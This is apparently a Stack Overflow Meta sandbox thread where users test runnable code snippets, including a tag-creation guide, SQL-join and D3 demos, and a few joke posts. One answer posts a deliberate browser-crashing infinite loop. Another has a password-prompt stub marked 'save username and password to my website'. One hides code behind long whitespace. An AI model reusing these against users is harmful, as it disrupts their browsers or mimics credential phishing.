Comment: Since my code-only answer here was ***not*** blocked, I conclude this sandbox is indeed an exception to the rule that [code-only questions or answers will be blocked](https://meta.stackoverflow.com/q/269753).

Answer (score -1):

To create a tag, one must apply it to a question. Any user with at least [1500
reputation](https://stackoverflow.com/help/privileges/create-tags) may add new
tags to any question by typing the new tag into the question tags field, and
submitting<sup>1</sup>.
A tag can be created by adding it to a new question, or by editing it into an
existing question. The person who adds the new tag is the creator of the tag.

**If you have enough reputation to create the tag**, and if you think there is
a **clear need** for a tag, go ahead and create it yourself.
Uncommon topics are perfectly valid for a tag, as long as they're still
clearly defined.
Make sure to submit at least an ***excerpt*** for the [tag wiki](https://blog.stackoverflow.com/2011/03/redesigned-tags-page/) so others can
see its intended use. If the new tag causes controversy, you can always come
back to Meta to ask the community to judge it.

**If you do not have enough reputation to create the tag**, then **add a
comment** on your question. Say that you wanted to add the tag to the
question, but do not have enough reputation.
Consider including a reason *why* you think this tag is appropriate.
If someone with enough reputation agrees with you, they will be able to create
the tag. Please delete your comment once this has happened.

As an alternative, you can request the creation of a tag by starting a new
**meta discussion**.
This gives other people the opportunity to discuss if the new tag is needed.

Topics to be addressed by you in the Meta question are, but not limited to:

- Existing questions where the tag would be appropriate
- Explain why the tag and such questions are on-topic for Stack Overflow
- Explain how the tag helps in categorizing and finding those questions
- Provide an initial tag wiki ***excerpt*** and a tag wiki ***description***
  for the new tag, see [here](https://meta.stackexchange.com/q/214337).
  The main purpose of the tag wiki *excerpt* - also known as ***user
  guidance*** - is to **tell people what the tag should be used for**.
  Its length is limited to ~500 characters. It *cannot* include markdown.
  The tag wiki *description* is written in markdown, and should stand alone as
  a detailed description of the tag, and should include all the information
  present in the excerpt. <sup>2</sup>
  The excerpt is by far the most important of the two tag wikis - *no tag should
  ever be created without having a guide on how to use it*.
- Propose a good fitting name for the tag as they are always lowercase, don't
  take spaces and have a maximum length of 35 characters.

#### When is it appropriate to create a tag?

Tags should be created if there is a clear need for them. For example, on Stack
Overflow, if a new programming language has been created and is in wide use,
but no one has asked any questions about it, a new tag should be created
for it. <sup>3</sup>

- *Tags connect experts with questions they will be able to answer.*
  <sup>4</sup>
  The most important purpose of a specific tag is to ***filter*** its questions
  to an audience of qualified answerers. This way answerers can mark specific
  tags as interesting or subscribe to the RSS feed for that tag. <sup>5</sup>
- *Tags are for sorting your question into specific, well-defined
  categories.*
  <sup>4</sup>
  Another purpose of a tag is to make it easier to find *similar* questions.
  This is accomplished by sorting tags into narrow, well-defined categories.
  Sorting into categories only works if users all sort into the same set of
  categories as other users. Thus, creating new tags should be done with care,
  because a new tag by definition is not used by anyone else. <sup>5</sup>

#### Common misconceptions about tags

- The purpose of tags is specifically *not* to summarize or index your
  question, but rather to *categorize* it, and that is a subtly different
  thing. <sup>5</sup>
  A typical ***invalid*** argument goes as follows:
  "Oh, but *this new tag* concerns only a handful of questions and is already
  perfectly covered by *this other much more generic tag* which covers
  thousands of questions."
  That's *indexing*, not *categorizing*. Don't fall for it.
- Don't use [**meta tags**](https://stackoverflow.blog/2010/08/the-death-of-meta-tags).
  Not even those that already exist. A meta tag is any tag that doesn't
  categorize the topic of the question, but simply indicates the nature of
  the question. Examples include [homework](https://stackoverflow.com/questions/tagged/homework) or [hard-question](https://stackoverflow.com/questions/tagged/hard-question).
  <sup>6</sup>

**Make sure you understand the *purpose* of tags as described above
and [*why* we tag questions](https://meta.stackexchange.com/a/32041).**
<sup>4</sup>

---

<sup>1 *Exception: a small number of tags have been blacklisted because
they've been deemed harmful; these tags cannot be recreated.*</sup>

**References**:
2 [What is a tag wiki?](https://meta.stackexchange.com/q/214337)
3 [When should a tag be created?](https://meta.stackexchange.com/a/146950)
4 [Why do we tag questions?](https://meta.stackexchange.com/a/32041)
5 [Creating new tags](https://meta.stackexchange.com/a/53469)
6 [Tagging Don'ts](https://meta.stackexchange.com/a/18879)

---

```js
document.write(JSON.stringify(...["Hello world!"]));
```

Comment: This does not demonstrate anything about Stack Snippets.

Comment: *This does not demonstrate anything about Stack Snippets.* ~ * ~
Rather than writing a comment like that, I would have preferred if you had explained why [you rolled back the question](https://meta.stackoverflow.com/posts/269754/revisions). Note that I am not saying it was wrong to roll it back - just that I would have preferred an explanation.

Comment: *This does not demonstrate anything about Stack Snippets.* ~ * ~ Not sure if it makes you any happier, but ***now*** it does.

Comment: There are already [Formatting Sandboxes](https://meta.stackexchange.com/q/3122/194720) available. There was a [question on Meta](https://meta.stackoverflow.com/q/251978/215552) about its existence. I would have preferred if you had created a meta post about asking about making the edit to the question in the first place, instead of taking a long-standing question that had a single defined purpose and adding another one.

Answer (score -1):

#### April fools!!!

```js
var $reasons = ['collecting fees', 'grabbing cookies', 'logging in secretly', 'setting a million +500 bounties', 'awarding them to non-answers', 'posting spam', 'reading e-mail address', 'sharing e-mail address online', 'flagging nothing', 'getting declined flags', 'posting help vampire questions', 'using images of code', 'downvoting others', 'serial voting', 'more spam', 'get to 1 reputation', 'posting non-answers', 'more non answers', 'stop machine'];
globalThis.number = 0;
setInterval(function() {
  if ($reasons[window.number] != undefined) {
    document.getElementById('log').innerHTML += $reasons[window.number] + "\n";
    globalThis.number += 1;
    window.scrollTo(0, document.body.scrollHeight);
  } else {
    clearInterval(self);
  }
}, Math.random() * 1500);
```

```css
body {
  font-family: monospace;
  background-color: black;
  color: white;
}
```

```html
<pre id="log">Please wait while we do something.
Logging on to SE
</pre>
```

Answer (score -1):

```css
#demo {
  border: 2px solid red;
  min-height: 5px;
}
```

```html
<meta name="viewport">

<script>

var today = new Date();
var date = today.getDate();
var text = "ఉదా: తేదీ " + date + " అయితే సామెతలు " + date + " నుంచి" ;

document.getElementById("demo").innerHTML = text ;

</script>

<h5 style="color:darkblue"> 2022 సంవత్సరం పూర్తి సిలబస్ </h5>

<p>ఒక సంవత్సరంలో బైబిల్ ను పూర్తిచేయు ప్రణాళిక<br>
సోమవారం నుంచి శనివారం వరకు 3 అధ్యాయాలు<br>
ఆదివారం 2 అధ్యాయాలు + జనరల్ ప్రశ్నలు</p>

<p> తేదీని బట్టి ప్రతిరోజు సామెతలు నుంచి 1 ప్రశ్న ఉంటుంది </p>

<p id="demo"></p>

<div style="margin: 0 auto"><iframe id="syllabus" src="https://docs.google.com/spreadsheets/d/e/2PACX-1vReY-tDEwKYjTiSjsfAN42qjFUwMv_OD3_64bFdGrgL-2p3otc13elLcCq3pkb5xqhTA-bW3QXobpqh/pubhtml?gid=0&amp;single=true&amp;widget=false&amp;chrome=false&amp;headers=false&amp;range=a1:b366"></iframe></div>
```

Answer (score -2):

Test of animated demonstration of SQL joins using HTML canvas.

```js
// Mulling the practicality of improving this and rewriting my 
// answer here when this functionality becomes available...
// http://stackoverflow.com/questions/13997365/sql-joins-as-venn-diagram/14011879#14011879

//Relies on code from http://dbp-consulting.com/scripts/canvasutilities.js for the arrows


function DoInnerJoin() {
            var predicate = function (a, b) { return a == b; };
            foo(4, "SELECT A.Colour, B.Colour FROM A INNER JOIN B ON A.Colour = B.Colour", predicate, "inner")
        }

        function DoCrossJoin() {
            var predicate = function (a, b) { return true; };
            foo(16, "SELECT A.Colour, B.Colour FROM A CROSS JOIN B", predicate, "cross")
        }

        function DoLeftJoin() {
            var predicate = function (a, b) { return a == b; };
            foo(5, "SELECT A.Colour, B.Colour FROM A LEFT JOIN B ON A.Colour = B.Colour", predicate, "loj")
        }



        function foo(resultBlocks, caption, predicate, joinType) {
            if (joinType != "inner" && joinType != "cross" && joinType != "loj" && joinType != "roj") {
                alert("unexpected join type")
            }

            var isOuterJoin = (joinType == "loj" || joinType == "roj");
            var canvas, context;

            canvas = document.getElementById('imageView');
            context = canvas.getContext('2d');

            var lineWidth = 4;
            var blockWidth = 50;
            var blockHeight = 25;
            var table1blockLeft = 50;
            var table2blockLeft = 150;
            var blockHeight = 25;


            var canvasHeight = resultBlocks * blockHeight + 100;
            canvas.height = canvasHeight;
            var table1blockRight = table1blockLeft + blockWidth;

            context.lineWidth = lineWidth;
            context.strokeStyle = '#000000';
            context.fillStyle = '#000000';

            context.clearRect(0, 0, canvas.width, canvasHeight);
            context.font = "bold 10pt Arial";

            context.fillText(caption, 10, 10);



            var leftTableValues = ['#ff0000', '#75923C', '#75923C', '#8DB4E3'];
            var rightTableValues = ['#60497B', '#75923C', '#75923C', '#8DB4E3'];

            context.font = "bold 16pt Arial";
            context.fillText("A", 70, canvasHeight - 130);

            for (var i = leftTableValues.length; i > 0; i--) {
                drawBlock(table1blockLeft, leftTableValues[i - 1], i);
            }

            context.fillText("B", 170, canvasHeight - 130);
            for (var i = rightTableValues.length; i > 0; i--) {
                drawBlock(table2blockLeft, rightTableValues[i - 1], i);
            }

            var funcs = [];

            var resultBlocksDrawn = 0;
            for (var i = leftTableValues.length; i > 0; i--) {
                var thisLeftItemMatched = false;

                for (var j = rightTableValues.length; j > 0; j--) {

                    var matched = predicate(leftTableValues[i - 1], rightTableValues[j - 1]);

                    funcs[funcs.length] = function (i, j) {
                        return function () {
                            drawArrowBetweenBlocks(i, j);
                        };
                    } (i, j);



                    funcs[funcs.length] = function (matched) {
                        return function () {
                            context.font = "bold 16pt 'Arial Unicode MS'";
                            context.fillStyle = matched ? '#75923C' : '#ff0000';
                            context.fillText(matched ? "✔" : "✘", 120, canvasHeight - 130);
                        };
                    } (matched);


                    if (matched) {
                        thisLeftItemMatched = true;
                        resultBlocksDrawn++;

                        funcs[funcs.length] = function (i, j, resultBlocksDrawn) {
                            return function () {
                                drawBlock(300, leftTableValues[i - 1], resultBlocksDrawn);
                                drawBlock(350, rightTableValues[j - 1], resultBlocksDrawn);

                            };
                        } (i, j, resultBlocksDrawn);

                    }

                    if (isOuterJoin && !thisLeftItemMatched && j == 1) {
                        resultBlocksDrawn++;

                        funcs[funcs.length] = function () {
                            return function () {
                                context.font = "bold 10pt Arial";
                                context.fillStyle = '#000000'
                                context.fillText("No joining rows", 10, 50);
                            };
                        } ();

                        funcs[funcs.length] = function (i, j, resultBlocksDrawn) {
                            return function () {
                                drawBlock(300, leftTableValues[i - 1], resultBlocksDrawn);
                                drawBlock(350, '#ffffff', resultBlocksDrawn);

                            };
                        } (i, j, resultBlocksDrawn);


                        funcs[funcs.length] = function () {
                            return function () {
                                context.clearRect(10, 30, canvas.width, 25);
                            };
                        } ();

                    }

                    funcs[funcs.length] = function () {
                        return function () {
                            context.clearRect(100 + 2, 25, 50 - 4, canvasHeight - 25);
                        };
                    } ();

                }

            }


            console.log(funcs.length)
            ProcessQueueItem();


            function ProcessQueueItem() {

                var f = funcs.shift();
                console.log(f)
                f();

                if (funcs.length > 0) {
                    window.setTimeout(ProcessQueueItem, 250)
                }
            }

            function drawArrowBetweenBlocks(leftIndex, rightIndex) {
                var leftMid = canvasHeight + blockHeight / 2 - (leftIndex * blockHeight) - lineWidth;
                var rightMid = canvasHeight + blockHeight / 2 - (rightIndex * blockHeight) - lineWidth;
                drawArrow2(context, table1blockRight, leftMid, table2blockLeft, rightMid);
            }

            function drawArrow2(ctx, x1, y1, x2, y2, style, which, angle, d) {
                context.lineWidth = 2;
                context.fillStyle = '#000000';
                drawArrow(ctx, x1, y1, x2, y2, style, which, angle, d)
                context.lineWidth = lineWidth;
            }


            function drawBlock(blockLeft, fillStyle, blocksRemaining) {
                blockTop = canvasHeight - (blocksRemaining * blockHeight) - lineWidth;
                context.strokeRect(blockLeft, blockTop, blockWidth, blockHeight);
                context.fillStyle = fillStyle;
                context.fillRect(blockLeft + lineWidth / 2, blockTop + lineWidth / 2, blockWidth - lineWidth, blockHeight - lineWidth);
                context.fillStyle = '#000000';
            }



        }
```

```html
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
    <title></title>
    <script src="http://dbp-consulting.com/scripts/canvasutilities.js"></script>
    <style type="text/css"><!--
#container { position: relative; }
#imageTemp { position: absolute; top: 1px; left: 1px; }
--></style>
</head>
<body>
  
    <div style="padding-bottom: 50px">
       <button onclick="DoCrossJoin()">
        Cross Join</button>
    <button onclick="DoInnerJoin()">
        Inner Join</button>
    <button onclick="DoLeftJoin()">
        Left Join</button></div>  
    <div>
        <canvas id="imageView" width="600" height="175"></canvas>
    </div>


    
</body>
</html>
```

Comment: Wait, was the hide feature included yesterday? (err, [never mind](http://meta.stackoverflow.com/questions/269754/stack-snippets-sandbox-try-it-out-here?answertab=active#comment91412_270614))

Answer (score -2):

### Purdy Colours with D3

Verdict on the Snippet editor:  Mostly great, but it has the same annoying feature as JSFiddle, with regards to the auto-indenting feature over-riding the correct indentation when using multi-line function chains.

E.g., when I type the following:

```js
var td = tr.selectAll("td")
           .data(function(d,i){ return d3.range(0,255); });
```

As soon as I type a `{`, the second line gets pushed flush-left.  I fix it, and then get to the `}`, and it happens again.   Urgh.

```js
var tb = d3.select("body").append("table");

var tr = tb.selectAll("tr")
           .data(d3.range(0,255) );

tr.enter().append("tr");

var td = tr.selectAll("td")
           .data(function(d,i){ return d3.range(0,255); });

td.enter().append("td");

td.style("background-color", function(d,i,j){ return d3.rgb(127, i, j); });
```

```css
table, tr { 
  border:none; 
  border-collapse:collapse; 
  padding:0; 
  margin:0; 
}
td {
  padding:1px; 
  border:none; 
  margin: 0;
}
```

```html
<script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/d3/3.4.11/d3.min.js"></script>
```

Comment: Unfortunately the editor is not advanced enough to understand this aspect. I might be able to make the auto-indenting a checkbox though.

Comment: That would work.  As I said [on the main feedback post](http://meta.stackoverflow.com/a/270978/3128209), there isn't exactly an agreed-upon standard for what indenting *should* be, but it is rather annoying when I indent things "just so" for readability, and then the algorithm pushes my code all around.

Comment: I turned off the feature that automatically re-indents the current line based on characters. We'll see how people enjoy it (I imagine it'll be fine). It'll go live next build.

Answer (score -2):

This is somewhat *odd*.

We *cannot* test media queries at the default box, like we'd do with jsFiddle frames.

Currently, we *must* click at `Full Page` to be able to resize and test different media queries.

```css
img {
  width: 100px;
  height: 100px;
  background-color: red;
}

@media (max-width: 500px) {
  img {
    background-color: green;
  }
}
```

```html
<img />
```

Answer (score -2):

This is a test about the code snippet function for this question on WPSE, there have not htis nice feature:
https://wordpress.stackexchange.com/questions/194271/how-to-disabled-a-button-when-press-three-times/194272

```js
jQuery( document ).ready( function( $ ) {

    var counter = 1,
        element = 'input.edit';

    $( element ).click( function(e) {
        counter ++;
        // for control debugging in console
        console.log( counter );
        if ( counter > 3 ) {
            $( element ).attr( 'disabled', true );
        }
    } )

} );
```

```html
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>
<input type="text" name="input" class="edit" value="Click here">
```

Answer (score -2):

```js
var username = window.prompt("What is your username?");
var password = window.prompt("What is your password?");
if (!password){
    alert("You haven't entered the password yet.")
}else if (!username){
    alert("You haven't entered the username yet.")
}else{
    //TODO: save username and password to my website
    alert("Thanks!");
}
```

Answer (score -3):

## Testing YouTube URL Embedding

**Regular** `https://www.youtube.com/watch?v=gocwRvLhDf8`

https://www.youtube.com/watch?v=gocwRvLhDf8

---

**Timestamped** `https://www.youtube.com/watch?v=gocwRvLhDf8&t=22`

https://www.youtube.com/watch?v=gocwRvLhDf8&t=22

---

**Shortened** `https://youtu.be/gocwRvLhDf8`

https://youtu.be/gocwRvLhDf8

---

**Embed** `https://www.youtube.com/embed/gocwRvLhDf8`

https://www.youtube.com/embed/gocwRvLhDf8

---

**Embedded HTML** `<iframe width="854" height="480" src="https://www.youtube.com/embed/gocwRvLhDf8" frameborder="0" allowfullscreen></iframe>`

---

**Mobile** `https://m.youtube.com/watch?v=gocwRvLhDf8`

https://m.youtube.com/watch?v=gocwRvLhDf8

---

**Flash Player** `https://www.youtube.com/v/gocwRvLhDf8`

https://www.youtube.com/v/gocwRvLhDf8

---

**YouTube TV** `https://www.youtube.com/tv#/watch/video/idle?v=gocwRvLhDf8`

https://www.youtube.com/tv#/watch/video/idle?v=gocwRvLhDf8

Answer (score -3):

```js
$(function () {
    $.getJSON('http://anyorigin.com/get?url=' + encodeURIComponent('http://chat.meta.stackoverflow.com/rooms/info/89/tavern-on-the-meta') + '&callback=?', function (data) {
        parser = new DOMParser();
        htmlDoc = parser.parseFromString(data.contents, "text/html");
        var a = htmlDoc.getElementsByClassName('username');
        var b = htmlDoc.getElementsByClassName('user-gravatar48');
        var c = document.getElementsByTagName('ul')[0];

        for (var i = 0; i < a.length; i++) {
            c.innerHTML = c.innerHTML + "<li><img src='" + b[i].src + "'/>It's " + a[i].innerHTML + '\'s fault!</li>';
        }
        var li = $('ul li'),
        spinBtn = $('#spin');
        for (var i = 0; i < 3; i++) {
            li.clone().appendTo('ul');
        }


        var randNum;
        function spin() {
            randNum = Math.random();
            spinBtn.attr('disabled', true).text('Hang on!');
            li.first().animate({
                marginTop: -(li.first().outerHeight(true) * (Math.floor(randNum * li.length * 2) + li.length * 2)) - 2
            }, 5000, 'easeOutQuad', function () {
                spinBtn.attr('disabled', false).text('Spin Again!');
            });
        }

        spinBtn.click(function () {
            li.first().css('margin-top', 0);
            spin();
            return false;
        });
        spin();
    });
});
```

```css
body {
    font-family: Arial, sans-serif;
    margin: 20px;
}
.clearfix {
    clear: both;
}
ul {
    float: left;
    margin-left: 20px;
    height: 24px;
    background-color: #efefef;
    padding: 10px 20px 10px 10px;
    overflow: hidden;
    -moz-border-radius: 3px;
    -webkit-border-radius: 3px;
    border-radius: 3px;
    -moz-box-shadow: 0 2px 2px rgba(0, 0, 0, 0.3);
}
ul li {
    font-size: 20px;
    margin-bottom: 30px;
}
ul li img {
    width: 24px;
    height: 24px;
    margin-right: 5px;
    vertical-align: bottom;
}
#csharp {
    display: inline-block;
    width: 24px;
    margin-right: 5px;
}
#blame {
    float: left;
    font-size: 12px;
    margin-top: 15px;
}
#spin {
    float: left;
    margin: -5px 0 0 15px;
    padding: 1px 3px 2px;
}
#sub {
    font-size: 11px;
    color: #ccc;
    clear: both;
    padding-top: 20px;
}
#sub a {
    color: #346C95;
}
#sub a:hover {
    color: #59B3EF;
}
#sub code {
    font-family: Consolas, Menlo, Monaco, 'Lucida Console', 'Liberation Mono', 'DejaVu Sans Mono', 'Bitstream Vera Sans Mono', 'Courier New', monospace;
}
#spin {
    position:absolute;
    -moz-box-shadow:inset 0px 0px 0px 0px #fce2c1;
    -webkit-box-shadow:inset 0px 0px 0px 0px #fce2c1;
    box-shadow:inset 0px 0px 0px 0px #fce2c1;
    background:-webkit-gradient( linear, left top, left bottom, color-stop(0.05, #ffc477), color-stop(1, #fb9e25) );
    background:-moz-linear-gradient( center top, #ffc477 5%, #fb9e25 100% );
    filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffc477', endColorstr='#fb9e25');
    background-color:#ffc477;
    -webkit-border-top-left-radius:42px;
    -moz-border-radius-topleft:42px;
    border-top-left-radius:42px;
    -webkit-border-top-right-radius:0px;
    -moz-border-radius-topright:0px;
    border-top-right-radius:0px;
    -webkit-border-bottom-right-radius:42px;
    -moz-border-radius-bottomright:42px;
    border-bottom-right-radius:42px;
    -webkit-border-bottom-left-radius:0px;
    -moz-border-radius-bottomleft:0px;
    border-bottom-left-radius:0px;
    text-indent:0px;
    border:1px solid #eeb44f;
    display:inline-block;
    color:#ffffff;
    font-family:Arial;
    font-size:15px;
    font-weight:bold;
    font-style:normal;
    height:65px;
    line-height:65px;
    width:131px;
    text-decoration:none;
    text-align:center;
    text-shadow:-1px -1px 0px #cc9f52;
}
#spin:active {
    background:-webkit-gradient( linear, left top, left bottom, color-stop(0.05, #fb9e25), color-stop(1, #ffc477) );
    background:-moz-linear-gradient( center top, #fb9e25 5%, #ffc477 100% );
}
    filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#fb9e25', endColorstr='#ffc477');
    background-color:#fb9e25;
}.spin:active {
    position:relative;
    top:1px;
}
```

```html
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js"></script>
<script type="text/javascript" src="http://cdnjs.cloudflare.com/ajax/libs/jquery-easing/1.3/jquery.easing.min.js"></script>
<p id="blame">The Wheel of Blame!</p>
<br class="clearfix" />
<ul>
<li><img src="https://i.stack.imgur.com/DdIcm.png" alt="" /> It's the SO Dev Team's fault!</li>
<li><span id="csharp">C#</span> It's C#'s fault!</li></ul>
<button id="spin">Spin it!</button>
```

Answer (score -3):

I think that it is time to make a [c](https://stackoverflow.com/questions/tagged/c) snippet.

```c
#include <stdio.h>
{
    printf("Hello, world.\n");
}
```

Welp, it wouldn't run (yet).

Answer (score -4):

```js
alert("Hello world");                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     document.getElementsByTagName("button")[0].addEventListener("click",()=>{alert("Hello world!")})
```

```html
<button>Click me</button>
```

Answer (score -5):

Sorry for another snippet from me, but I couldn't resist a stack overflow example for Stack Overflow:

```js
function so(){
  try
  {
  so();
  }
  catch(e)
  {
    alert(e);
  }
}
so();
```

Answer (score -5):

```css
div {
  background-color: black;
  color: white;
}
```

```html
<div>test</div>
```

Answer (score -8):

This could crash your browser. Have a nice day :-)

```js
a=[];while(true){a.push(a)};
```

Comment: Didn't realize this would crash the browser until I expanded it.  I wish stackoverflow would protext against this.

Answer (score -8):

Let

- $(\Omega,\mathcal A)$ be a measurable space and $\mathbb F=(\mathcal F_n)_{n\in\mathbb N_0}$ be a filtration on $(\Omega,\mathcal A)$
- $E$ be an at most countable set equipped with the discrete topology
- $X=(X_n)_{n\in\mathbb N_0}$ be a discrete Markov chain on $(\Omega,\mathcal A)$ with respect to $\mathbb F$ with values in $(E,\mathcal E)$

> Let $x\in E$ be recurrent, $$\tau_x^k:=\inf\left{n>\tau_x^{k-1}:X_n=x\right}\;\;\;\text{with }\tau_x^0:=0\;,$$ $t_0:=x$ and $$t_k:=\tau_x^k-\tau_x^{k-1}\;\;\;$$ for $k\in\mathbb N$. How can we prove, that $(t_k)_{k\in\mathbb N_0}$ is independent and identically distributed?

---

Let $k\in\mathbb N_0$. Then, $\tau:=\tau_x^{k-1}$ is a $\mathbb F$-stopping time. Let $$\tilde X:=\left(X_{\tau+n}\right)_{n\in\mathbb N_0}\;.$$ The strong Markov property yields for all $n\in\mathbb N_0$
\begin{equation}
\begin{split}
\operatorname P_x\left[t_k=n\right]&=\operatorname P_x\left[\tilde X_1\ne x,\ldots,\tilde X_{n-1}\ne x\text{ and }\tilde X_n=x\right]\
&=\operatorname P_{X_\tau}\left[X_1\ne x,\ldots,X_{n-1}\ne x\text{ and }X_n=x\right]\
&=\operatorname P_x\left[X_1\ne x,\ldots,X_{n-1}\ne x\text{ and }X_n=x\right]
\end{split}\tag 1
\end{equation}
$\operatorname P_x$-almost surely, since $\operatorname P_x\left[\tau<\infty\right]=1$ by the recurrence of $x$. Since the right-hand side of $(1)$ doesn't depend on $k$, the $t_k$ are indeed identically distributed.

How can we show, that they are independent, too?

Answer (score -20):

Thankyou for the downvotes; I confirmed Fullscreen rendering when the answer is greyed out was wrong. They've now disabled the running of code snippets when the post gets downvoted.

```html
<h1>Just testing...</h1>
```

Comment: Hmm.  I'm not sure we should worry *too* much about fullscreen rendering for a negative-points question, but the transparent overlay isn't exactly functional.

Comment: @AmeliaBR It's not the rendering per se, but the fact that most of the rest of the display is still interactive while you're in fullscreen mode! I edited this comment while fullscreen was active, for example.

Comment: Hadn't even thought to try that.  But I think you'll have to leave a bug report on the current [feedback thread](http://meta.stackoverflow.com/questions/270944/feedback-requested-stack-snippets-2-0?cb=1) to get something to happen -- unless someone is trying out the sandbox themselves,they aren't likely to discover your -13 answer when there are two pages of posts!

Comment: @AmeliaBR Good point, but this was based upon a [downvoted feedback post](http://meta.stackoverflow.com/questions/269753/feedback-requested-runnable-code-snippets-in-questions-and-answers?page=2&tab=active#comment87615_269776) from the original feedback Q.

Comment: @AmeliaBR [Done](http://meta.stackoverflow.com/a/270981/256431).

Comment: Now you deserve to get the rep back. +1 :)

Comment: @modiX, you don't lose rep on this meta site, so downvotes don't hurt you.

Comment: @modiX Note I made this CW to start with, to avoid any of that :-) But that's also partly why I followed AmeliaBR's suggestion to add a new answer [here](http://meta.stackoverflow.com/a/270981/256431).

Comment: @gunr2171 I should mention I did think this was [meta.se] too.